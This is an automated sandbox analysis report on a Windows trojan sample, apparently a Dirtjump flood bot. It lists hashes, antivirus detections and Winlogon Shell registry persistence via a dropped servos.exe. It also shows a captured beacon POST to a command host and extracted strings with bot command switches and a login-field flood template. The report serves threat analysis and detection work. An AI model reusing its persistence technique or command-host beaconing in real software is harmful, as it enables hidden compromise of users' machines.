Analysis Date: 2015-12-14 20:52:39
MD5: d990a3d5e45b4cc657f9238a66c23e12
SHA1: 9f5a8bb7b02b46a974a7b351c617a43d2f1ccea9

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: sha1: size:
Section.data md5: 93b82342b4b07d71dcaeaa2467d0abd1 sha1: 6f39d22918114d7ca3c3ae3dfea8c187e0778259 size: 2048
Section.xcpad md5: sha1: size:
Section.idata md5: 93b82342b4b07d71dcaeaa2467d0abd1 sha1: 6f39d22918114d7ca3c3ae3dfea8c187e0778259 size: 2048
Section.reloc md5: 791bb323f186de559bae99be5ccf0dc5 sha1: 6363d61b6ffc408b08cc71af73085cec092a5b50 size: 2048
Section.rsrc md5: 9296019393cd10c9017c94cb1b77f691 sha1: b3d1896803c9f700e075da9bc130d6aac3b0791d size: 28160
Timestamp
VersionLegalCopyright:
PackagerVersion:
InternalName:
FileVersion:
CompanyName:
Comments:
ProductName:
ProductVersion:
FileDescription:
Packager:
OriginalFilename:
Packer
PEhash
IMPhash: 2db53d48dd1f35054e31bffab1f4f814
AV Ad-Aware: Gen:Variant.Barys.20804
AV Alwil (avast): Virtu-F:Win32:Virtu-F
AV Arcabit (arcavir): Gen:Variant.Barys.20804
AV Authentium: W32/Virut.AI!Generic
AV Avira (antivir): TR/ATRAPS.Gen
AV BitDefender: Gen:Variant.Barys.20804
AV BullGuard: Gen:Variant.Barys.20804
AV CA (E-Trust Ino): Win32/Virut.17408!corrupt
AV CAT (quickheal): no_virus
AV ClamAV: no_virus
AV Dr. Web: Trojan.PWS.Tibia.2413
AV Emsisoft: Gen:Variant.Barys.20804
AV Eset (nod32): Win32/Spy.Delf.PKE
AV F-Secure: Gen:Variant.Barys.20804
AV Fortinet: W32/Delf.PHQ!tr
AV Frisk (f-prot): W32/Virut.AI!Generic
AV Grisoft (avg): Win32/DH{ggZn?}
AV Ikarus: Backdoor.Win32.HacDef
AV K7: Riskware ( 0040eff71 )
AV Kaspersky: Backdoor.Win32.Generic
AV MalwareBytes: Trojan.Injector.DF
AV Mcafee: no_virus
AV MicroWorld (escan): Gen:Variant.Barys.20804
AV Microsoft Security Essentials: Trojan:Win32/Dishigy.J
AV Rising: no_virus
AV Symantec: Trojan.Dirtjump
AV Trend Micro: no_virus
AV Twister: no_virus
AV VirusBlokAda (vba32): no_virus
AV Zillya!: no_virus

Runtime Details:

Screenshot

Process
↳ C:\9f5a8bb7b02b46a974a7b351c617a43d2f1ccea9.exe

Creates File: C:\Windows\resources\themes\Aero\Shell\NormalColor\ShellStyle.dll
Creates File: C:\
Creates File: C:\9f5a8bb7b02b46a974a7b351c617a43d2f1ccea9.exe
Creates File: C:\Users\Admin\AppData\Local\Microsoft\Windows\Caches\cversions.1.db
Creates File: C:\Users\Admin\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000007.db
Creates File: C:\desktop.ini
Creates File: C:\Windows\servos.exe
Creates File: C:\ProgramData\systemskey.ini
Creates File: C:\ProgramData\systemskey.ini
Creates File: Nsi
Creates Mutex
Registry: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell ➝
explorer.exe, servos.exe\\x00
Registry: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell ➝
explorer.exe, servos.exe\\x00
Registry: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell ➝
explorer.exe, servos.exe\\x00
Registry: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell ➝
explorer.exe, servos.exe\\x00
Registry: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell ➝
explorer.exe, servos.exe\\x00
Registry: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell ➝
explorer.exe, servos.exe\\x00

Network Details:


Raw Pcap
0x00000000 (00000)   504f5354 202f7772 67746866 35343367   POST /wrgthf543g
0x00000010 (00016)   2f204854 54502f31 2e310d0a 486f7374   / HTTP/1.1..Host
0x00000020 (00032)   3a20676f 6c6d792e 72750d0a 55736572   : golmy.ru..User
0x00000030 (00048)   2d416765 6e743a20 4d6f7a69 6c6c612f   -Agent: Mozilla/
0x00000040 (00064)   342e3020 28636f6d 70617469 626c653b   4.0 (compatible;
0x00000050 (00080)   204d5349 4520382e 303b2057 696e646f    MSIE 8.0; Windo
0x00000060 (00096)   7773204e 5420362e 313b2054 72696465   ws NT 6.1; Tride
0x00000070 (00112)   6e742f34 2e303b20 534c4343 323b202e   nt/4.0; SLCC2; .
0x00000080 (00128)   4e455420 434c5220 322e302e 32303439   NET CLR 2.0.2049
0x00000090 (00144)   36393b20 2e4e4554 20434c52 20332e35   69; .NET CLR 3.5
0x000000a0 (00160)   2e323034 3936393b 202e4e45 5420434c   .204969; .NET CL
0x000000b0 (00176)   5220332e 302e3230 34393639 0d0a4163   R 3.0.204969..Ac
0x000000c0 (00192)   63657074 3a202a2f 2a3b713d 302e310d   cept: */*;q=0.1.
0x000000d0 (00208)   0a416363 6570742d 456e636f 64696e67   .Accept-Encoding
0x000000e0 (00224)   3a20677a 69702c64 65666c61 74650d0a   : gzip,deflate..
0x000000f0 (00240)   41636365 70742d4c 616e6775 6167653a   Accept-Language:
0x00000100 (00256)   2072752d 52552c72 753b713d 302e382c    ru-RU,ru;q=0.8,
0x00000110 (00272)   656e2d55 533b713d 302e352c 656e3b71   en-US;q=0.5,en;q
0x00000120 (00288)   3d302e33 0d0a436f 6e6e6563 74696f6e   =0.3..Connection
0x00000130 (00304)   3a204b65 65702d41 6c697665 0d0a436f   : Keep-Alive..Co
0x00000140 (00320)   6e74656e 742d4c65 6e677468 3a203137   ntent-Length: 17
0x00000150 (00336)   0d0a436f 6e74656e 742d5479 70653a20   ..Content-Type: 
0x00000160 (00352)   6170706c 69636174 696f6e2f 782d7777   application/x-ww
0x00000170 (00368)   772d666f 726d2d75 726c656e 636f6465   w-form-urlencode
0x00000180 (00384)   640d0a0d 0a6b3d32 6f75706d 716a3639   d....k=2oupmqj69
0x00000190 (00400)   36743034 6736                         6t04g6


Strings
StringX
TObject
u:hD
SVWUQ
Z]_^[
SVWU
YZ]_^[
SVWU
]_^[
SVWU
w;;t$
]_^[
SVWU
]_^[
SVWUQ
Z]_^[
SVWU
YZ]_^[
SVWU
uW;{
u:;{
]_^[
ZYYd
ZYYd
SVWU
]_^[
YZ^[
SVWU
]_^[
ZYYd
_^[YY]
QSVW
UhN"@
ZYYd
hU"@
_^[Y]
SVWU
$;L$
$)D$
YZ]_^[
QSVW
ZYYd
_^[Y]
YZXu
SVWU
C<"u1S
Q<"u8S
7CF;
7CF;
]_^[
Ht Ht.
r/f=
w)f%
SVWQ
SVWR
	w%9
~KxI[)
2_^[
YZXt5
YX_^

hd1@
Uh=1@
ZYYd
hD1@
SOFTWARE\Borland\Delphi\RTL
FPUMaskValue
PPRTj
YYZX
YZXtp
VWUd
SPRQ
T$(j
SVWU
]_^[
]_^[
d$,1
,t\=
t=HtN
r6t0
t.Ht
Ph*7@
ZYYd
_^[]
Uhr8@
ZYYd
_^[]
SVWU
]_^[
;_^[
t!R:
SVWRP
Z_^[X
uXJt
uAJt
u:Jt
It2S
t&J|
N|*9
t1SVW
;_^[
PSVW
_^[X
_^[X
ZYYd
_^[YY]
ZYYd
Uh&C@
ZYYd
h-C@
Uh~C@
ZYYd
ZYYd
ZYYd
ZYYd
UhIG@
ZYYd
hPG@
| C3
	TRegistry
TCommand0
h8J@
ZYYd
h$J@
QSVW
_^[Y]
QZ^&
QSVW
_^[Y]
SVW3
ZYYd
ZYYd
^[YY]
QQQQQQSVW
UhaY@
ZYYd
hhY@
ZYYd
^[Y]
ZYYd
ZYYd
SVW3
ZYYd
ZYYd
gui,vkxoiq
Software
Microsoft
Windows NT
CurrentVersion
Winlogon
explorer.exe,
Shell
QQQQQQQSVW3
UhO`@
h|`@
Uh*`@
ZYYd
ZYYd
hV`@
gui,vkxoiq
hh_@
; WOW64
Bangladesh
Russia
United Kingdom
Egypt
China
Iran
Mongolia
India
Grenada
Thailand
Romania
Germany
France
Ukraine
United States
ZYYd
ZYYd
_^[YY]
QQQQQSVW
Uhce@
Uh>e@
ZYYd
ZYYd
hje@
.com
.net
.org
http://
h0h@
h<h@
hLh@
hph@
h|h@
h0h@
hph@
h0h@
hHi@
h`i@
ZYYd
Mozilla/5.0 (Windows NT
; rv:
.0) Gecko/20100101 Firefox/
Opera/9.80 (Windows NT
; U; Edition
 Local; ru) Presto/2.10.289 Version/
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT
; Trident/4.0; SLCC2; .NET CLR 2.0.
; .NET CLR 3.5.
; .NET CLR 3.0.
h\n@
hpn@
h|n@
hTo@
hto@
ZYYd
https://
http://
error1
error2
error3 (
 HTTP/1.1
Host:
User-Agent:
Accept: */*;q=0.1
Accept-Encoding: gzip,deflate
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Connection: Keep-Alive
Referer:
POST
Content-Length:
Content-Type: application/x-www-form-urlencoded
error4 (Send)
ZYYd
ZYYd
SVWU
]_^[
SVWU
]_^[
QSVW
_^[Y]
Sh|t@
_^[]
QQQQQSVW
UhMy@
ZYYd
ZYYd
hTy@
SVW3
ZYYd
UhV{@
ZYYd
ZYYd
kkm,|ampqcwo{p
QSVW3
ZYYd
ZYYd
ZYYd
ZYYd
ZYYd
ZYYd
ZYYd
ZYYd
ZYYd
wo2wphqd
1d728bjqkpz+
63G/E,81<.H275;78A64=2FBDCF3:.8C
"7xqrD
<qrcj=/oiqX
POST
200 OK
-get
-post1
-post2
-ip
-ip2
-request
login=[1000]&pass=[1000]&password=[50]&log=[50]&passwrd=[50]&user=[50]&username=[50]&vb_login_username=[50]&vb_login_md5password=[50]
-timeout
-thread
https://
http://
POST
 HTTP/1.1
Host:
User-Agent:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Connection: Keep-Alive
Referer: http://
Content-Length:
Content-Type: application/x-www-form-urlencoded
GET
Referer:
ZYYd
ZYYd
Error
Runtime error     at 00000000
0123456789ABCDEF
kernel32.dll
DeleteCriticalSection
LeaveCriticalSection
EnterCriticalSection
InitializeCriticalSection
VirtualFree
VirtualAlloc
LocalFree
LocalAlloc
GetTickCount
QueryPerformanceCounter
GetVersion
GetCurrentThreadId
GetThreadLocale
GetStartupInfoA
GetModuleFileNameA
GetLocaleInfoA
GetLastError
GetCommandLineA
FreeLibrary
ExitProcess
WriteFile
UnhandledExceptionFilter
SetFilePointer
SetEndOfFile
RtlUnwind
ReadFile
RaiseException
GetStdHandle
GetFileSize
GetFileType
CreateFileA
CloseHandle
user32.dll
GetKeyboardType
MessageBoxA
CharNextA
advapi32.dll
RegQueryValueExA
RegOpenKeyExA
RegCloseKey
oleaut32.dll
SysFreeString
kernel32.dll
TlsSetValue
TlsGetValue
LocalAlloc
GetModuleHandleA
advapi32.dll
RegSetValueExA
RegOpenKeyExA
RegFlushKey
RegCreateKeyExA
RegCloseKey
OpenThreadToken
OpenProcessToken
GetTokenInformation
FreeSid
EqualSid
AllocateAndInitializeSid
kernel32.dll
Sleep
MoveFileA
GetLastError
GetCurrentThread
GetCurrentProcess
FindFirstFileA
FindClose
FileTimeToLocalFileTime
FileTimeToDosDateTime
ExitThread
CreateThread
CloseHandle
wsock32.dll
WSAStartup
gethostbyname
socket
shutdown
setsockopt
send
recv
inet_addr
htons
connect
closesocket
shell32.dll
SHFileOperationA
SHGetSpecialFolderPathA
0,080<0@0D0H0L0P0T0b0j0r0z0
1"1*121:1B1J1v1~1
1H2O2
4,5p5
7*8G8R8]8e8o8y8
9%9-989>9K9Q9k9r9|9
:+:J:b:j:
;/;M;w<
=!>?>D>J>
?#?9?_?k?s?
0-050;0D0K0P0V0i0r0
1#121B1b1z1
2&262<2D2
2-343D3N3T3\3b3h3o3y3 4I4g4s4{4
5'5O5h5
8'9P9W9^9.:C:v:
:(;/;
<-<6<=?E?N?
1/1F1[1
2V3j3r3
4(4;4k4
7&7>7`7
738F8Z8
9,969[9e9o9w9}9
1*212C2a2j2v2}2
3;3G3N3X3b3y3
3&4;4L4V4^4f4n4v4
5&52575<5C5J5T5k5w5
6&6.666>6F6N6V6^6f6n6v6~6
7+777D7V7
7D8P8d8l8p8t8x8|8
8D8G9r9
:7:O:
=6=Y=
>#>1>?>Q>^>
1!1%1)1-1115191=1A1E1I1M1Q1U1\1j1x1
2 2J3X3
4%4E4I4M4Q4U4Y4x4
5$5Q5
7'777G7d7
:6:Z:
: ;8;Q;j;o;w;|;
<9<k<|<
I0s0
0)1D1
818W8q8
:4:<:K:\:h:
:_;v;
<!<\<r<w<
=$=5=I=U=y=
>3>K>c>
?+?D?h?
0<1Z1y1
2+2<2S2w2
3)3=3Y3i3
404d4
405A5V5
6T6m6
7$7B7V7
7(8C8w8
8(9N9|9
:.:3:8:L:Q:V:l:q:v:{:
;9;E;Y;^;c;w;|;
=-=C=X=x=
2 2*252G2\2`2d2h2l2p2t2x2|2
004080
&=O8
cdcdfd
UTypes
System
SysInit
WinSock
KWindows
;9o,
|u#A
/%JF|
z6Y_m=eY
c{[Q6
_oTen
v0w{
{wOk`
{EzOj
=[srS(
8tHGE
8-u@u
7`9SBK
NuY0
b}[6V
,e3I
{ufU
j"hh,~
M&FuRE
2 R0hX
#Y^F
qs+3
Ba)PQ
-K&0H
yLQC
/s-m
O$2W
ct,A9
{&e,`
qCn?
|;8sTo'
W.:1 ,
2gTk
5$9F
D:oo<q
UIAX]
Igxmv
4zrn5
5J%c
V2j&n*
Ww()oO
M}%p
hvrI.
"/A #
!sdD
d4xZ|
r|=_p4
4J^J
j]"pa
t:TE6
Yh>r
5l<!
cEx%j
k3l'
" SyBrb
x[l9
B:m_R
&YBu
$jS=
I?}#
-	B}L&*
`%B7;rB
'8UwX/
oEXA
<g~a
.x6"
qd?Wk+
V;au
1\J7
Lne*
:~<.
^R]Os
Acx-
x}1i
E\K6B
v{,+
s zT
C\wA;
?>_+
o&5D
 &t~@
e*g\4@
	KRA
/E3d
%rT.
}<LF
w{MX
Ipf)
/]=Gt
D{@)
6SIxv_l
f%;(
Bd}u
da2Z
0S[z
6H^G
l!2;
)eFb
dg7eq
s;uQ
o9]n
XTVi
 PK)
4JEK
b'R#
?}+5
:A<I
*n.J
yhvlg
7Ntu
)y+NY
tdHnl
w_+'
C8MC
}[Xf
7@;U
9NId
^~J7
![QE7
uy?G
S0R9
j>iD3
OkL2D
|:G="mu
:O-=
'2iZ&TkEc
Wgct1
*BMv:c
cOr,
]~Y\Z
XH@W
$=M5
'Et$
@.@~
Sce,
ZR`P
(j(<
W];B
_'E(
-"r)
*Y T
ID]l
B=!SiM"
S~LVZ
Rr7f
=})S*
A~9q
KT>*
/>'q
,e6Tj
v_u%
c!`p
/BX<
IWo.
p0GQ
&#=E
h'5*
Eq>]
]BgD
OP$o
ttJTw1
2ulr
Da{R
#}lpf
R9Y|Bg
Vvh'N
/	/<
B"vL
1 ]y
i=&&'
-L=fs
td*n
YW(bJ
={$f{
-,wf(
VICpC
6$)7
w?!Y
&)|TQ.
?%j>R
T[xGI
-cQ&~
ofxx
:[US
EUM5
sQGcd
/?V0
EbXy
H~Bu
l"yW6$
qlPW
`@Ykx
:v4B
mf8nX
EIZB
4WDC
Pc|GJ
,N8O
zgbM
X8w`
mI8?~
Bg}\
tF&b
-9^vr
fN1D
Wh\Z
S7'o#
g{$@B
kc{-
4j 1
XJK,
;Va"
X+;j
Es3cA
o[>B
RmCV
-5%- m
f4hS
L|Z:k
QIez'd
QV3z
YR~ad
s4)@
4}	"w*
R^jG
^E	b
FJ]=a&
`zA./
\-\Ul
-+>R
9<&=-=
=Ll)
nzw=
.HdG
gs,?
f5-p
9QRTf
0)sI
%qQ-
pe4G7g
LfDp
VbP?J
ARI@,
	$i^0q
84x"
s4;U
s}3a
6h1_
`2)*a=Z
6Wydq
73)U
i\\n
Ym~FA
RA,\
k\XACS
6A{O4j
xj(A2
^s:0
=dg?3
@ZgO
7	az
"b^k}|\a
.k^
I^M|B
T(P;
/j(:>j
:0fZ
X&6G
2O:q
a *d
)f*h
&.EL
W&8	.kr3
I%BE
HN	w
:qxy.
dg1
gU%~
 P-,\
0*),Q
M\5#
I74D.
\x|Sx
-i~d
)z+9R
+U,1
\iUk
;w33
0|h+2X
	i}]e3
w!{M
_;!j
lIpd
xEg[
[F,J
)`'c
%5H+
Mjj8@V3
@H^(
DHX"R
{}V;Ja
O$wA
*_Q@*.
$MeL
oT<_
\/5z)
~FbI*
Ur7W
.+`B}
Yd8.<
XT)w
UEb[>
:?Q5
yH-k
9\Z9
!50p
bccdb4)
LYh"
*p*g
:(GQuQ
:^De,B
tFhB
0-[L
1.-<
zG.L
W!	J>i
s;my
r6_s
Y_,c
*F	A
{ZLg
+A4F
0$$P
,mlY
?f?z
D1/1R
q5IO|
<l)V
v5Ub
<9xaF
^SnG
CC3D$
;+t$(
y+D$0